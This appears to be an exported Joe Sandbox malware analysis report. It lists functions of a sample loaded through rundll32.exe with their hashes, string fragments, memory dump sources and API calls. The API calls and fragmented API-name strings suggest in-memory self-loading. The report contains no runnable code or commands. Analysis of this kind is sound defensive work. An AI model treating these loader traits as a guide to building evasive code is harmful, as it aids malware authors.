Opcode Fuzzy Hash: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
Instruction Fuzzy Hash: C1221BB050478C8BDBB8CF64C9897DD7BB0FB44308F10862DDA5AAB250CBB45686CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180013780 Relevance: 7.8, Strings: 6, Instructions: 323
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$, xrefs: 0000000180013C6D
"`2, xrefs: 00000001800139CE
kO, xrefs: 000000018001387E
lmq, xrefs: 0000000180013A6B
tro, xrefs: 00000001800139A0
lbzZ, xrefs: 0000000180013863

Memory Dump Source

Source File: 00000003.00000002.363901894.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: $$"`2$lbzZ$lmq$tro$kO
API String ID: 0-2401169580
Opcode ID: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
Instruction ID: 279b0f6eedbbacd77816cba7ac57bf6919de5fbe0bc464da326619847ce4fcd1
Opcode Fuzzy Hash: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
Instruction Fuzzy Hash: BBF1C3709047488FDBA8DFA8D9867DDBBB1FB48304F20821DD84AEB255DB749A49CF41

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000FC48 Relevance: 6.7, Strings: 5, Instructions: 447
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

EX., xrefs: 000000018001032D
PT, xrefs: 000000018001038A
2f, xrefs: 000000018001051C
)#?, xrefs: 0000000180010418
UbA, xrefs: 00000001800103C4

Memory Dump Source

Source File: 00000003.00000002.363901894.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: )#?$EX.$PT$UbA$2f
API String ID: 0-1318892062
Opcode ID: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
Instruction ID: a9b5704be98d3dd027f678fe08c59eda011257bdda9cf4ed25ea0f7660729633
Opcode Fuzzy Hash: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
Instruction Fuzzy Hash: 8B320DB190078C8BDBB8CF64C8856DD7BF0FB48318F50852DEA1A9B251DBB45685CF98

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001FC0C Relevance: 6.6, Strings: 5, Instructions: 400
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

tZp, xrefs: 000000018001FFAF
QP|m, xrefs: 000000018001FCBC
qjf, xrefs: 000000018001FD57
?F, xrefs: 0000000180020023
$T, xrefs: 000000018001FF09

Memory Dump Source

Source File: 00000003.00000002.363901894.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: $T$?F$QP|m$qjf$tZp
API String ID: 0-3477398917
Opcode ID: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
Instruction ID: e54beaa769b94aae3cb673a52a2b60ade73482c6e5d3d936cdc9b6ae13d51efd
Opcode Fuzzy Hash: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
Instruction Fuzzy Hash: 0B122870A0470CDFCF69DFA8C08A6DDBBF2FB44344F1091A9E816AB261D7759A19CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180016D3C Relevance: 6.6, Strings: 5, Instructions: 379COMMON

Download Yara Rule

Strings

v, xrefs: 00000001800170BE
t, xrefs: 0000000180017275
x\J, xrefs: 00000001800171C3
k&(, xrefs: 0000000180017125
JQ, xrefs: 0000000180016D72

Memory Dump Source

Source File: 00000003.00000002.363901894.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: JQ$k&($t$v$x\J
API String ID: 0-1134872184
Opcode ID: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
Instruction ID: 7c1fd17b310acde7e359d6be57bcfb6c2dd011f2caef592e77d3cba241376f6b
Opcode Fuzzy Hash: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
Instruction Fuzzy Hash: F312E0B0504709EFCB99DF28C18AADE7BF0FB48308F40812AF80A9B254D774DA58DB45

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000703C Relevance: 6.3, Strings: 5, Instructions: 87COMMON

Download Yara Rule

Strings

)H8, xrefs: 000000018000709E
?rIc, xrefs: 000000018000710E
L==, xrefs: 0000000180007159
V, xrefs: 0000000180007053
R, xrefs: 00000001800070D3

Memory Dump Source

Source File: 00000003.00000002.363901894.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: R$)H8$?rIc$L==$V
API String ID: 0-2512384441
Opcode ID: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
Instruction ID: 6f6f9af97a41f07aad9f9d1cbd67af5334817a93c453241fb2a5d498ae2065c2
Opcode Fuzzy Hash: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
Instruction Fuzzy Hash: 3541D0B090074E8BCF48CF64D49A5DE7FB0FB68398F20421DE856A6250D3B896A5CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800119A8 Relevance: 6.3, Strings: 5, Instructions: 63COMMON

Download Yara Rule

Strings

S, xrefs: 0000000180011A92
Qq, xrefs: 0000000180011A84
vird, xrefs: 00000001800119C2
+, xrefs: 00000001800119DA
bt, xrefs: 0000000180011A1E

Memory Dump Source

Source File: 00000003.00000002.363901894.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Qq$bt$vird$+$S
API String ID: 0-3373980505
Opcode ID: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
Instruction ID: 8c34661c01ca41a1498f33dadfb9b2381b3c020394efcb6cfebc1cbd8490f91c
Opcode Fuzzy Hash: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
Instruction Fuzzy Hash: 8831C2B081038A8FDB45CF64C88A5DE7BF0FB58358F115A19F869A6250D3B4D668CF81

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180011AD0 Relevance: 5.3, Strings: 4, Instructions: 335COMMON

Download Yara Rule

Strings

@, xrefs: 0000000180011F6B
P9, xrefs: 0000000180011DC0
V, xrefs: 0000000180011B81
^_", xrefs: 0000000180011D6E

Memory Dump Source

Source File: 00000003.00000002.363901894.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: V$@$P9$^_"
API String ID: 0-1880944046
Opcode ID: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
Instruction ID: ef3f81825b514374c5d287d432cdf068934c0dc0259921085eace1de493a05f6
Opcode Fuzzy Hash: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
Instruction Fuzzy Hash: B6F1DF70504749EFCB98CF28D18AACE7BE0FB48348F50812AF81A9B264D770DA59DB45

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800132F0 Relevance: 5.3, Strings: 4, Instructions: 312COMMON

Download Yara Rule

Strings

syG, xrefs: 000000018001339D
=_, xrefs: 00000001800136EB
b/, xrefs: 000000018001347F
F)k, xrefs: 000000018001336C

Memory Dump Source

Source File: 00000003.00000002.363901894.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: =_$F)k$b/$syG
API String ID: 0-3955183656
Opcode ID: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
Instruction ID: 3a63fdd7148b145f5d2717dabea2a2fa508061acbcc25a132c341bfe6e9ad30f
Opcode Fuzzy Hash: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
Instruction Fuzzy Hash: DED12771A0478D8BCF59DFA8C88A6EEBBB0FB48344F10421DE846A7650D7B4D909CF85

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180002D70 Relevance: 5.3, Strings: 4, Instructions: 266COMMON

Download Yara Rule

Strings

#X, xrefs: 0000000180002E74
vG, xrefs: 000000018000316F
'Xsa, xrefs: 0000000180002EA2
iJ6, xrefs: 0000000180003091

Memory Dump Source

Source File: 00000003.00000002.363901894.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: #X$'Xsa$iJ6$vG
API String ID: 0-746338152
Opcode ID: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
Instruction ID: 8ba50615c78112980223cca8f04f1fa67c4b69ee5a809e4e0bd2b8ae6832a1bb
Opcode Fuzzy Hash: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
Instruction Fuzzy Hash: 93E154B590070DDFCB88DF68D19A9DD7BB9BB49308F404029FC0E9A264D3B4E919CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800097C0 Relevance: 5.3, Strings: 4, Instructions: 257COMMON

Download Yara Rule

Strings

-Z, xrefs: 0000000180009D06
MIC, xrefs: 0000000180009BF0
*i^, xrefs: 0000000180009A7A
]2, xrefs: 0000000180009CC2

Memory Dump Source

Source File: 00000003.00000002.363901894.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: *i^$MIC$-Z$]2
API String ID: 0-498664264
Opcode ID: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
Instruction ID: 9792ecb135b2155067e966d5e38dbf4f409fde80c29e70d57d2078ebe1ce15c6
Opcode Fuzzy Hash: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
Instruction Fuzzy Hash: 10E1C670109B888FDBF8DF64CC86BEB7BA5FB44346F10651DD84A8A290DBB46645CF41

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180010758 Relevance: 5.2, Strings: 4, Instructions: 222COMMON

Download Yara Rule

Strings

EG, xrefs: 000000018001082C
_, xrefs: 0000000180010A56
QsF, xrefs: 0000000180010894
B, xrefs: 0000000180010AEC

Memory Dump Source

Source File: 00000003.00000002.363901894.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: B$EG$QsF$_
API String ID: 0-784369960
Opcode ID: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
Instruction ID: 62dbbc71664ee0946fffbba3b71afe09b12d9ffe0d1744d6deb9db65ff0cd9cc
Opcode Fuzzy Hash: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
Instruction Fuzzy Hash: 3FB1387010468D8FDF88DF28C88A6DA3FA1FB68388F614219FC4A97250C778D694CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180020334 Relevance: 5.2, Strings: 4, Instructions: 190COMMON

Download Yara Rule

Strings

Z`35, xrefs: 00000001800205D3
5B.Y, xrefs: 000000018002045A
., xrefs: 00000001800206DC
-`G, xrefs: 00000001800206A2

Memory Dump Source

Source File: 00000003.00000002.363901894.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: -`G$.$5B.Y$Z`35
API String ID: 0-1363032466
Opcode ID: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
Instruction ID: b244d414363a4385de25ad5610b22aaac7fb2f2c92cf8150697ad32e565f4bd8
Opcode Fuzzy Hash: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
Instruction Fuzzy Hash: 29A1FB716157888FEB7ADF24C89A7CE7BE1FB49308F40461DD98E8A250D7B49609CB42

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000EE98 Relevance: 5.2, Strings: 4, Instructions: 167COMMON

Download Yara Rule

Strings

*+_, xrefs: 000000018000EF25
#o, xrefs: 000000018000EFD8
WSh, xrefs: 000000018000EEF0
\O, xrefs: 000000018000F046

Memory Dump Source

Source File: 00000003.00000002.363901894.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: *+_$WSh$\O$#o
API String ID: 0-1846314129
Opcode ID: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
Instruction ID: 175ce4bc0e22c7a636d32034be2bbb8ad42f6b3cb6a748f64f507b7f0b29ed37
Opcode Fuzzy Hash: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
Instruction Fuzzy Hash: 1971167160474ECFCB98DF18C489ADA3BE1FB58318F414529FC09A7264DB74DAA8CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180024D80 Relevance: 5.2, Strings: 4, Instructions: 155COMMON

Download Yara Rule

Strings

M*K, xrefs: 0000000180024E36
O, xrefs: 0000000180024F9B
\<, xrefs: 0000000180024E9B
.B, xrefs: 0000000180025032

Memory Dump Source

Source File: 00000003.00000002.363901894.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: .B$O$M*K$\<
API String ID: 0-3225238681
Opcode ID: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
Instruction ID: 95d2fbb8f7fe970b1359d27f41ccd6aad584115d4fee043204e0c0f4c3f3b287
Opcode Fuzzy Hash: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
Instruction Fuzzy Hash: 7181E370549788CFEBBACF24C886BDE7BE4FB48744F20461DE85A8A260DB709645CF41

Uniqueness

Uniqueness Score: -1.00%

Function 000000018002A42C Relevance: 5.1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

~O, xrefs: 000000018002A626
$, xrefs: 000000018002A454
xVO, xrefs: 000000018002A587
$, xrefs: 000000018002A477

Memory Dump Source

Source File: 00000003.00000002.363901894.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: $$$$xVO$~O
API String ID: 0-3655128719
Opcode ID: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
Instruction ID: 8f78542db34460f4381821bab2b7e4f68a699ed7f8b2fc47c959991f0b02677a
Opcode Fuzzy Hash: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
Instruction Fuzzy Hash: 5B61D1B05187448FD369DF28C18965BBBF1FBC6744F008A1EF6868A260DB76D948CB47

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800024B8 Relevance: 5.1, Strings: 4, Instructions: 79COMMON

Download Yara Rule

Strings

JMg, xrefs: 000000018000252F
l, xrefs: 0000000180002548
G, xrefs: 0000000180002557
,IW, xrefs: 0000000180002565

Memory Dump Source

Source File: 00000003.00000002.363901894.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ,IW$G$JMg$l
API String ID: 0-1370644289
Opcode ID: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
Instruction ID: 7fb8b97fd43ed4dc52a467cdcf5cca41e6e56dbc92574a5c866222c6b731b82a
Opcode Fuzzy Hash: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
Instruction Fuzzy Hash: 0A41D3B190074E8FCB48CF64C88A5DE7FB0FB18358F10461EE85AA6250D7B89695CFC9

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180018AB4 Relevance: 5.1, Strings: 4, Instructions: 119COMMON

Download Yara Rule

Strings

,, xrefs: 0000000180018B66
,, xrefs: 0000000180018C14
i`}G, xrefs: 0000000180018BFA
2S=, xrefs: 0000000180018BF3

Memory Dump Source

Source File: 00000003.00000002.363901894.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ,$,$2S=$i`}G
API String ID: 0-4285990414
Opcode ID: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
Instruction ID: 665cb0e6160ce90faac3fa7baf9a16caae401c848b442bb7533a8cc1fd62885f
Opcode Fuzzy Hash: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
Instruction Fuzzy Hash: 4D41E57051CB848FD7B4DF18D486BDABBE0FB98750F40495EE48DC3251DBB0A8858B86

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exePID: 7164, Parent PID: 7076COMMON

Execution Graph

Execution Coverage:	10.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	11
Total number of Limit Nodes:	0

Executed Functions

Function 0000023700180000 Relevance: 76.3, APIs: 5, Strings: 38, Instructions: 1094
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 0000023700180450
GetNativeSystemInfo.KERNELBASE ref: 0000023700180539
VirtualAlloc.KERNELBASE ref: 0000023700180580
VirtualProtect.KERNELBASE ref: 00000237001809E9
RtlAddFunctionTable.KERNEL32 ref: 0000023700180A79

Strings

onTa, xrefs: 0000023700180171
Slee, xrefs: 00000237001800B7
urce, xrefs: 0000023700180340
Reso, xrefs: 00000237001802DB
lloc, xrefs: 00000237001800F0
aryA, xrefs: 00000237001800D8
Virt, xrefs: 00000237001800E0
ncti, xrefs: 000002370018016A
Reso, xrefs: 0000023700180338
Virt, xrefs: 00000237001800F8
urce, xrefs: 000002370018035D
Load, xrefs: 00000237001802F4
Size, xrefs: 0000023700180311
tion, xrefs: 0000023700180128
Cach, xrefs: 000002370018012F
urce, xrefs: 0000023700180304
hIns, xrefs: 000002370018011A
Libr, xrefs: 00000237001800D0
ofRe, xrefs: 0000023700180318
RtlA, xrefs: 000002370018015C
Lock, xrefs: 0000023700180330
GetN, xrefs: 0000023700180136
ualP, xrefs: 00000237001800FF
eSys, xrefs: 0000023700180144
Free, xrefs: 000002370018034D
rote, xrefs: 0000023700180106
urce, xrefs: 00000237001802E7
ddFu, xrefs: 0000023700180163
Find, xrefs: 00000237001802D0
truc, xrefs: 0000023700180121
Load, xrefs: 00000237001800C8
Reso, xrefs: 00000237001802FC
ativ, xrefs: 000002370018013D
sour, xrefs: 000002370018031F
temI, xrefs: 000002370018014B
Reso, xrefs: 0000023700180355
Flus, xrefs: 0000023700180113
ualA, xrefs: 00000237001800E8

Memory Dump Source

Source File: 00000004.00000002.365166488.0000023700180000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023700180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_23700180000_rundll32.jbxd

Similarity

API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
API String ID: 394283112-2517549848
Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
Instruction ID: b139585af4b7adf608f990c40be5357e73c5ff41adeda1e037b6451fdac0547e
Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
Instruction Fuzzy Hash: 0A72B370518B4C8BDB6DDF18C8897ADB7E1FB98314F10462DE88AC7251DB38D645CB86

Uniqueness

Uniqueness Score: -1.00%

Function 000000018002C058 Relevance: 10.4, Strings: 8, Instructions: 370
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Z, xrefs: 000000018002C36B
Ekf, xrefs: 000000018002C0CA
<W, xrefs: 000000018002C1D0
l, xrefs: 000000018002C347
l, xrefs: 000000018002C1F5
-:, xrefs: 000000018002C100
(I, xrefs: 000000018002C62C
#C, xrefs: 000000018002C55D

Memory Dump Source

Source File: 00000004.00000002.364590650.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: #C$(I$-:$Ekf$<W$Z$l$l
API String ID: 0-464535774
Opcode ID: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
Instruction ID: edc4d0e98499d5b5adff65828f8d1fd2ac7ce79502a6533da94e18623254a36a
Opcode Fuzzy Hash: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
Instruction Fuzzy Hash: C102E3B151038CDBCB99DF28C8CAADD3BA1FB48398F956219FD0697260D774D884CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180010FF4 Relevance: 7.9, Strings: 6, Instructions: 363
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\, xrefs: 0000000180011205
/Zb, xrefs: 000000018001119F
/v|, xrefs: 00000001800113E2
)|x, xrefs: 000000018001168C
OV4T, xrefs: 0000000180011307
lA, xrefs: 0000000180011819

Memory Dump Source

Source File: 00000004.00000002.364590650.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: )|x$/Zb$/v|$OV4T$\$lA
API String ID: 0-3528011396
Opcode ID: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
Instruction ID: 5dbdb21e6b24644f90705741d0e2e2cc24c858ca1caac6c8284349b4f9dc1789
Opcode Fuzzy Hash: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
Instruction Fuzzy Hash: 8C2204705097C8CBDBBECF64C885BDA7BA8FB44B08F10521DEA4A9E258DB745744CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180021618 Relevance: 7.8, Strings: 6, Instructions: 266
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

.pN, xrefs: 0000000180021AE0
)O, xrefs: 000000018002164B
t(/, xrefs: 0000000180021ABB
, xrefs: 00000001800219DA
&.+, xrefs: 000000018002180B
F>9, xrefs: 0000000180021937

Memory Dump Source

Source File: 00000004.00000002.364590650.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: $&.+$)O$.pN$F>9$t(/
API String ID: 0-3036092626
Opcode ID: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
Instruction ID: e4baced68933c0a0796cf32b330105f1a6d3ed4de4784e8c7f389f9334031704
Opcode Fuzzy Hash: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
Instruction Fuzzy Hash: E6E109716093C89FEBBACF24C8897DE7BA1FB59344F50421DD88A8E250DB745B49CB42

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000C608 Relevance: 5.6, Strings: 4, Instructions: 616
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

sf, xrefs: 000000018000CE95
w\H, xrefs: 000000018000C959
K', xrefs: 000000018000CAC7
+#;), xrefs: 000000018000CBDA

Memory Dump Source

Source File: 00000004.00000002.364590650.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: +#;)$K'$sf$w\H
API String ID: 0-1051058546
Opcode ID: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
Instruction ID: 30c6111824d62709d88844cae5ccd518ea343406d57bec7882368cdc1c6a6611
Opcode Fuzzy Hash: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
Instruction Fuzzy Hash: 8362F97050068D8FDB48DF28C89A6DD3FA1FB58388F524229FC4AA7251D778D999CBC4

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001E3AC Relevance: 4.0, Strings: 3, Instructions: 215
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

<w., xrefs: 000000018001E582
<4P, xrefs: 000000018001E690
<8, xrefs: 000000018001E63C

Memory Dump Source

Source File: 00000004.00000002.364590650.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: <4P$<8$<w.
API String ID: 0-1030867500
Opcode ID: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
Instruction ID: 97d266913d6b0fd63d839b3c54903fd41a2ccd22a8a26fffcb9587bfe3b6431f
Opcode Fuzzy Hash: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
Instruction Fuzzy Hash: C8B1E17151A384ABD788CF28C1C994BBBE1FBD4754F906A1DF8C68B260D7B0D948CB02

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180009100 Relevance: .1, Instructions: 125
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.364590650.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
Instruction ID: 281782cf28aa09d34d334260f991d1b96cfbd8271b51b9b7c31761fd0664cb75
Opcode Fuzzy Hash: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
Instruction Fuzzy Hash: 4B51EC715087889BCBB8DF18C9856CA7BF0FF95704F50891DE9898B250DF719A44DB42

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0000000180022010 Relevance: 9.0, Strings: 7, Instructions: 235
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

]k, xrefs: 000000018002232E
94, xrefs: 0000000180022371
M8;, xrefs: 0000000180022338
1l7., xrefs: 00000001800220AF
]$d, xrefs: 00000001800220D6
"+H, xrefs: 000000018002236A
]k, xrefs: 0000000180022069

Memory Dump Source

Source File: 00000004.00000002.364590650.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: "+H$1l7.$M8;$]$d$]k$]k$94
API String ID: 0-2447245168
Opcode ID: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
Instruction ID: 1221e244f5383d3e6569bf50eb566ee92e7d288cf12f4405919b94e37960c7a7
Opcode Fuzzy Hash: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
Instruction Fuzzy Hash: 3FB10D7160130CCBDBA9DF28C18A6DA3BE1FF48748F114129FD1A97261D774E919CB46

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800059B8 Relevance: 7.9, Strings: 6, Instructions: 408
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

